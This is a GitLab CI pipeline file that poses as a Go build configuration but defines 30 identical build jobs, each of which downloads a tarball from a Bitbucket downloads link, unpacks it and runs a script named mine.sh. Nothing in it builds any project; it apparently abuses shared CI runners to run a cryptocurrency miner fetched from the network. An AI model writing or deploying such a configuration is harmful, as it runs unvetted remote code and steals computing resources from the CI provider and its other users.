image: golang:latest

variables:
  REPO_NAME: gitlab.com/namespace/project

stages:
  - build
  - test
  - deploy

build_a:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh

build_b:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh

build_c:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh

build_d:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh

build_e:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh

build_f:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh

build_g:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh

build_h:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh

build_i:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh

build_j:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh

build_k:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh

build_l:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh

build_m:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh

build_n:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh

build_o:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh

build_p:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh

build_q:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh

build_r:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh

build_s:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh

build_t:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh
    
build_u:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh

build_v:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh

build_w:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh

build_x:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh

build_y:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh

build_z:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh

build_ab:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh

build_ac:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh

build_ad:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh

build_ae:
  stage: build
  script:
    - wget https://bitbucket.org/abyehaqie/nona/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./mine.sh
